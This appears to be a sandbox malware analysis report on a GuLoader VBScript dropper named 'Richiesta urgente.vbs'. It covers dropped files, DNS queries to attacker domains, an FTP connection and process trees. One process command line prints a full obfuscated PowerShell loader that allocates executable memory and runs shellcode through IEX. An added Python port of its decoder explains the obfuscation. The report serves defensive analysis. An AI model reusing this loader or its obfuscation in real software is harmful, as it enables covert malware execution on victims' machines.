Preview: .using System;using System.Runtime.InteropServices;public static class Reabridged1 {[DllImport("winmm.dll")]public static extern int midiOutOpen(int kvali,int Kon,int Ringed,int Unwo,int Ude);[DllImport("kernel32")]public static extern int LocalShrink(int scorpi,int Nsketn);[DllImport("kernel32")]public static extern int SetCommState(int Kofta,int Storry);[DllImport("kernel32")]public static extern int HeapCreate(int Necrop,int Flsk,int Grup);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("imm32.dll")]public static extern int ImmSetStatusWindowPos(int Pala,int Raz);[DllImport("ADVAPI32.DLL")]public static extern int InitializeAcl(int Col,int Una,int Flopp201);[DllImport("gdi32")]public static extern int SetWindowExtEx(int Duc,int Henbl,int Sideta,int Appas);[DllImport("gdi32")]public static extern int UnrealizeObject(int Howean);[DllImport("user32")]public static extern int GetKeyState(int For);[DllImport("gdi32")]public static ex
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
Category: dropped
Size (bytes): 371
Entropy (8bit): 5.2724394416051705
Encrypted: false
SSDEEP: 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fuT2Gzxs7+AEszI923fuT2hxn:p37Lvkmb6Kz2T2GWZE22T2b
MD5: D6A1C20A450BBBE5A57366705B164C64
SHA1: B6B4FBA84E9EA8BE6ACBCF8B0C31B0CF80828165
SHA-256: 631A7CB72C20067D016139BA01FFFEA4F5A28C0DD5EDB5C805275183B8BE39D9
SHA-512: EF2A70EAE2AC62B008EC585149DAB2B850FE5667B0265F065F5002B736CEA1479D68EEC6AD56219385C219A80B5BDB0DE2996B742725822C235E83DC9CF250C6
Malicious: true
Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.0.cs"
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 4096
Entropy (8bit): 3.2933249715555086
Encrypted: false
SSDEEP: 48:6jkQn/oLUdmWi8PiNnhucpm77Fvlb41ulgma3blq:puo47rdqm7Hbr3K
MD5: 3DE7A3FE4B71E0AE06B6C4D8778C24FA
SHA1: 61F551C09BEFF6E8BB994E6B0E2D6B13FA34B12F
SHA-256: E1B6C6B65C4313E2DD89AF4F6C619FA059EC1268CF4AE0EB661E7690564B9DC4
SHA-512: 82A552524A26FA65E6340A84AE828C60C7841AE9585D8059163FEE29CF652C22202E05DDCF1110C468949D710E07282E5C13DB08FD01F26FA09C81C737F56D00
Malicious: false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c...........!.................'... ...@....... ....................................@..................................&..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......P ..h...........................................................BSJB............v4.0.30319......l.......#~..P.......#Strings............#US.........#GUID.......l...#Blob...........G.........%3....................$.......................................3.,...............H.).................................... :............ F............ R............ _............ j. .......... w............ ............. .. .......... ..(.......... ..(.......... ............. ........
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
Category: modified
Size (bytes): 866
Entropy (8bit): 5.323647555720293
Encrypted: false
SSDEEP: 24:Aqd3ka6Kz02XE202aKaM5DqBVKVrdFAMBJTH:Aika6a0+E20RKxDcVKdBJj
MD5: 596472A8FA705DBA98A38E713E5C6AC5
SHA1: 49A69DDD7C70238FE1B0A62636072830ECD2EB07
SHA-256: 0047CDAF9FB443408ACDF55FF6D9F4409C7D5B554AFD980357760CB2DF49B8E7
SHA-512: 759546A855353402CF43524E95BFE599D9D2C8F2C28B02E646C71873618833523EBC9C766083E77D55F67F1B1E6C63F3BED3AF1805D83DA5720A5B64CDFECD2E
Malicious: false
Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: MSVC .res
Category: dropped
Size (bytes): 652
Entropy (8bit): 3.1110642504291888
Encrypted: false
SSDEEP: 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry07irak7YnqqH7iEPN5Dlq5J:+RI+ycuZhNgmakSb3PNnqX
MD5: 5484828547E61E5ED20C9C7AA3F8A993
SHA1: 4C45EF4BA03B144EEDBEC4955A1EE1B4599CCD2C
SHA-256: 255D05714ECF0937F6E0A8375F0856FA5B815A4BB59F1E64867ED0B2BD0DA42A
SHA-512: A792290BDAEEDAD3571F14A034B4032DE61D97756FEB88B568B39F8908689E4CBA815942B0DFD9D72D9B849BD63A76EA2005C88EA351AA89A472DA5FF3E01B07
Malicious: false
Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.v.g.l.2.3.k.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...2.v.g.l.2.3.k.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 28 19:06:44 2022, 1st section name ".debug$S"
Category: dropped
Size (bytes): 1328
Entropy (8bit): 3.995196855324645
Encrypted: false
SSDEEP: 24:HOe9E26ZgcH9hKPfwI+ycuZhNgmakSb3PNnq9qd:IdrKPo1ulgma3blq9K
MD5: 9EBABE1B4A1E0150B53DC653F83DC046
SHA1: 6F09AAF253D410C604F5DDE80FFE7FD54D0D88BF
SHA-256: 0E57FA5A4FE501D3B91C70B6A2CF9CFA828F103FB8C270DDE6CE13B58EE755AB
SHA-512: D07C90286AF63EAE69BB3E28E2272D18B409A3BE67369093CFE0DBEAC3BF5D06F4D1EC30B627344638053EA41B47A105F374E6FD7F46039D2A6E64082221B9F7
Malicious: false
Preview: L......c.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP...............T...G..^...z..............5.......C:\Users\user\AppData\Local\Temp\RESA66C.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.v.g.l.2.3.k.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 30
Entropy (8bit): 3.964735178725505
Encrypted: false
SSDEEP: 3:IBVFBWAGRHneyy:ITqAGRHner
MD5: 9F754B47B351EF0FC32527B541420595
SHA1: 006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256: 0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512: C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious: false
Preview: NordVPN directory not found!..
File type: ASCII text, with CRLF line terminators
Entropy (8bit): 5.846060220348072
TrID:
File name: Richiesta urgente.vbs
File size: 356020
MD5: de0edf01710a38b1e96688ae2f712ebb
SHA1: 6791a70cf79c415ba109e86734bcfd1b4930ec31
SHA256: 20796159ce1191fe88603ee4be1855bca614bcb29161d149a6990b48589d88c5
SHA512: 8456bd4c7106a8231f07407fa692520436a9be635fe6245e20d0d61efe11bd2664f758dc7a2f30eb7fd0839e90b854972d5c6d31d6b7e800d78bbf5bb4d970b9
SSDEEP: 6144:JmYNxYtoG4TDkYeZrZZL1HQTazh6VQIGoeJTaBrSlWYNemg/j4XO9Zob4HZIKK:8JaVerZzwTi4VyoKKrSlZN4/7F6KK
TLSH: 3874BFA0DB1D2B040B7F175A9C42DB49E4EA772A62121C7CADA9078E3D32238D73F715
File Content Preview: ..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
Icon Hash: e8d69ece869a9ec4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 28, 2022 11:08:14.020556927 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020558119 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020569086 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020577908 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020591021 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020596981 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020610094 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020627975 CET8049709162.240.62.179192.168.2.5
Timestamp   Source Port   Dest Port   Source IP   Dest IP
Nov 28, 2022 11:08:12.997488976 CET   55039   53   192.168.2.5   8.8.8.8
Nov 28, 2022 11:08:13.331123114 CET   53   55039   8.8.8.8   192.168.2.5
Nov 28, 2022 11:08:34.404402018 CET   59220   53   192.168.2.5   8.8.8.8
Nov 28, 2022 11:08:34.511842966 CET   53   59220   8.8.8.8   192.168.2.5
Timestamp   Source IP   Dest IP   Trans ID   OP Code   Name   Type   Class   DNS over HTTPS
Nov 28, 2022 11:08:12.997488976 CET   192.168.2.5   8.8.8.8   0x5a31   Standard query (0)   qwedft.gq   A (IP address)   IN (0x0001)   false
Nov 28, 2022 11:08:34.404402018 CET   192.168.2.5   8.8.8.8   0xcfa6   Standard query (0)   ftp.mcmprint.net   A (IP address)   IN (0x0001)   false
Timestamp   Source IP   Dest IP   Trans ID   Reply Code   Name   CName   Address   Type   Class   DNS over HTTPS
Nov 28, 2022 11:08:13.331123114 CET   8.8.8.8   192.168.2.5   0x5a31   No error (0)   qwedft.gq   -   162.240.62.179   A (IP address)   IN (0x0001)   false
Nov 28, 2022 11:08:34.511842966 CET   8.8.8.8   192.168.2.5   0xcfa6   No error (0)   ftp.mcmprint.net   -   185.31.121.136   A (IP address)   IN (0x0001)   false
                        • qwedft.gq
Timestamp   Source Port   Dest Port   Source IP   Dest IP   Commands
Nov 28, 2022 11:08:34.638608932 CET   21   49711   185.31.121.136   192.168.2.5
    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 1 of 50 allowed.
    220-Local time is now 12:08. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Nov 28, 2022 11:08:34.643579960 CET   21   49711   185.31.121.136   192.168.2.5
    220 Logout.

                        Target ID:0
                        Start time:11:05:04
                        Start date:28/11/2022
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs"
                        Imagebase:0x7ff707f10000
                        File size:163840 bytes
                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:1
                        Start time:11:05:06
                        Start date:28/11/2022
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:CMD.EXE /c echo C:\Windows
                        Imagebase:0x7ff627730000
                        File size:273920 bytes
                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:2
                        Start time:11:05:06
                        Start date:28/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7fcd70000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:3
                        Start time:11:05:36
                        Start date:28/11/2022
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe 
hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAgeNurSu3Ke2Ma`"""Fo)fl]DepdiuCibStlOuiSecBi ScsHytBjalitFliDrcBl ToeCoxBytFoeGarRenPo SeitunMetDa UnGMoeprtHaKFoefoyNeSBotMuaGrtFeeSk(BaiVinSttNo SkFFooUnrGe)Di;lo[ByDPelTulMiIMimKapCooInrPutxe(Un`"""RegCydWoiDo3Me2Us`"""St)Be]KopMauHybBolEdiLvcRe SksDatFlaTitdaiChcDr EneMexFetTaeTorWenKl BriErnThtRe LaPAloPelGiySoTBueCrxSetDiOInuBetKo(VeiNanEmtRe UfFFoeSpeSidInsSttSt,YoiPanBltLe ElFOblSpoUrrKieFu,NeiEtnEltPs TrLRaiBemAn)Be;Br[UbDArlMylStIismStpAcoHerLytHe(vl`"""SuuUnsPreAfrhj3Kr2Pr`"""Un)Un]IspPauSrbPalSmicocma FrsretBoaSttBeiancPr OweBoxKotFaeUrrSnnSu FriStnUntma AnESaxUrcTrlliuPrdBrePsUBepTodDoaUntArePoRAugMonBy(DeiKlnHatVa PaUMunAbdPr1Ba3Ti7Le,UniSknAntSk UnKSonUniUnrPo)Ni;Sk[MiDaslEklStIUnmRkptroCarUntEl(Kr`"""TikCueDyrVanBreIdlUn3Bo2Di`"""po)Su]IdpenudrbTmlOpiGrcfl MesMatKhaDotDiiSycAs LaeOvxRetUreGrrUsnst OuivinPetBe KoSAreXatFrCMioAinFlsLooUnlOpeTeMOdoLodGoecr(sciMunsutCh LvCYdrKoaChvVeaUntTa,iniApnlstNs 
RuSGovgrmKumKr)Th;Pa[ElDDilStlviISamTepKooAfrFotMa(la`"""SikAeeDdrafnToeSnlCa3Ob2Ag`"""St)he]TepInuStbFolPeiPrcan PosphtSyaudtSoiDecBl OueSaxNotNoeBerLanPo TeIVanSatRePPrtLarBl LaEArnSyuTrmnoSReyDesSktRaeKlmBlLPaoTecImaUtlAneDisPeWMe(KauLyiDenOvttn CrvAc1Cu,SjilonAmtOy SavKa2St)Ti;Be}Ti'De;br`$PrRReeSkaEmbRerPhiSvdKogKueUrdYo3Ts=Ba[FyRtieMaaNobSmrHoiLidUdgBieReddr1Id]Co:Af:GlVBriExrMetFouInaImlReAGrllalAkoKocDi(Un0Ud,No1In0Pa4Ef8at5Ca7Ta6ul,Ch1ud2Ha2Ha8Ud8Be,Bo6Ve4Sy)do;Sc`$FeHPaeDraFjdStbEiaOmnaldFosCr=Tv(KvGRoeSjtTu-siIKrtAbeApmSaPParEkoLypsoeChrUdtHeySt Fl-ToPgraPotSnhBi Ge'UnHToKDaCSaUAf:Al\FlAApnCotTaaPrrRi\OvHmiaSlnBadBrlGniKonUdgPrsGo'un)Mi.TiDHjeortOseWokGrtBreAlrCaiPinFygFoeGurEsnAdeKksLo;Un`$BoTRewReihenReeTh Kr=Ls Ov[MeSVeyOpsVetAzeMymAu.OmCThoAgnPivSwelarTotEl]Ne:Vg:ReFserMeoismInBEraTrsDeeAb6Po4SpSRetacrLeiinnDegPa(Ra`$ClHBeeVoaBodUnbBeaPonBedDisLo)Le;Ti[UnSTryOfsPatCleShmRe.SeRReuMinSttFoiAemCueEl.TrITunBhtEveErrProKopTrSNyeRergevLeiPhcKrePhsEd.seMSuaFirunsPrhAaaDelSo]Ej:Pr:WrCReoHypDeyGr(Ho`$AgTRewFoidinTaeSt,Fo Ca0Sc,Wi Th Ca`$EkRCyePoaQubdirPsividOpgRaeDadOs3do,Ku Ga`$MiTMawUniefnBreFo.TrcRvoFiuRanbytSp)Su;Pa[afRFoeJuaRebChrUniPldmngIneSedCo1lo]Tu:Af:NyEIcnBluRemGuSOsyCesPrtDieDimItLProBicToaDalSaeHasTrWDe(Fi`$SoRIneFoaGabEjrKeiPodRegSieTodSa3lu,Is Eg0fe)pi#Vo;""";Function Reabridged4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Regionplanarbejderne = $Regionplanarbejderne + $HS.Substring($i, 1); } $Regionplanarbejderne;}$Enterprise0 = Reabridged4 'GrITyEDoXLy ';$Enterprise1= Reabridged4 $Skolegaardene;&$Enterprise0 $Enterprise1;;
                        Imagebase:0x12e0000
                        File size:430592 bytes
                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.759722470.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
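
The PowerShell command line of Target ID 3 carries its own decoder: the `Reabridged4` function keeps every third character of `$Skolegaardene` (string index 2, 5, 8, ...), the same routine turns `'GrITyEDoXLy '` into the cmdlet name that is then invoked with `&`, and the decoded text is what actually runs. The Python port below is an editorial example added to this report; it is not code from the sample or from Joe Sandbox. It reproduces the routine exactly, including the `$i -lt $HS.Length-1` stop condition that silently drops a real character sitting at the final index, and runs it over three fragments copied from the command line above (each kept with its trailing junk characters so the last real character survives). The Win32 constant tables used to label the `VirtualAlloc` arguments are standard values and not something taken from the report.

```python
"""Port of the every-third-character decoder used by the PowerShell stage.

The fragments below are copied verbatim from the command line in this report;
the decoder and the Win32 constant tables are the editor's own.
"""
import re

def reabridged4(hs: str) -> str:
    """Exact port of the sample's Reabridged4: take hs[2], hs[5], hs[8], ...
    while the index is strictly less than len(hs) - 1.  That bound means a
    real character at the very last index is never emitted, which is why
    callers must keep the junk that follows a fragment."""
    out = []
    i = 2
    while i < len(hs) - 1:
        out.append(hs[i])
        i += 3
    return "".join(out)

# The cmdlet selector: `&$Enterprise0 $Enterprise1` runs this on the decoded text.
ENTERPRISE0 = "GrITyEDoXLy "

# Opening of $Skolegaardene as it appears on the page.
FRAGMENT_ADD_TYPE = "ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa"

# The allocation call near the end of $Skolegaardene, with the two junk
# characters that follow the closing parenthesis kept so it is not dropped.
FRAGMENT_VALLOC = (
    "Ba[FyRtieMaaNobSmrHoiLidUdgBieReddr1Id]Co:Af:"
    "GlVBriExrMetFouInaImlReAGrllalAkoKocDi(Un0Ud,No1In0Pa4Ef8at5Ca7Ta6ul,"
    "Ch1ud2Ha2Ha8Ud8Be,Bo6Ve4Sy)do;"
)

# Standard Win32 values (not from the report) used to read the VirtualAlloc args.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

def explain_virtualalloc(decoded: str) -> dict:
    """Pull the four VirtualAlloc arguments out of decoded PowerShell and label
    the allocation type and page protection; an RWX region is the usual home
    for shellcode that is copied in and then executed."""
    m = re.search(r"VirtualAlloc\((\d+),(\d+),(\d+),(\d+)\)", decoded)
    if not m:
        return {}
    _addr, size, alloc, prot = (int(x) for x in m.groups())
    return {
        "size": size,
        "alloc_type": sorted(n for bit, n in MEM_FLAGS.items() if alloc & bit),
        "protect": PAGE_PROTECT.get(prot, hex(prot)),
        "rwx": prot == 0x40,
    }

def decode_all() -> dict:
    """Decode the three fragments and interpret the allocation call."""
    valloc = reabridged4(FRAGMENT_VALLOC)
    return {
        "cmdlet": reabridged4(ENTERPRISE0),
        "opening": reabridged4(FRAGMENT_ADD_TYPE),
        "valloc": valloc,
        "valloc_info": explain_virtualalloc(valloc),
    }

if __name__ == "__main__":
    for key, value in decode_all().items():
        print(f"{key}: {value}")
```

Decoding the selector gives `IEX`, the opening decodes to `Add-Type -TypeDefinition`, and the allocation call decodes to `[Reabridged1]::VirtualAlloc(0,1048576,12288,64)`, i.e. a 1 MiB `MEM_COMMIT|MEM_RESERVE` region with `PAGE_EXECUTE_READWRITE` protection. The same function can be pointed at the whole `$Skolegaardene` string once it has been lifted out of the command line, but the quoting that cmd.exe and PowerShell applied to the embedded `"""` sequences has to be undone first, so the fragments here are decoded individually.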

                        Target ID:4
                        Start time:11:05:36
                        Start date:28/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7fcd70000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:7
                        Start time:11:06:43
                        Start date:28/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
                        Imagebase:0x1f0000
                        File size:2170976 bytes
